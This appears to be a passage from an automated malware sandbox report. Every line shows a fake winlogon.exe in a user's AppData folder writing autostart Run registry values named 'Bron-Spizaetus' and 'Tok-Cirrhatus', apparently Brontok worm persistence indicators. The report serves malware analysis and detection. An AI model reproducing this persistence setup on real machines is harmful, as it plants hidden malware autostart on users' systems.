                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
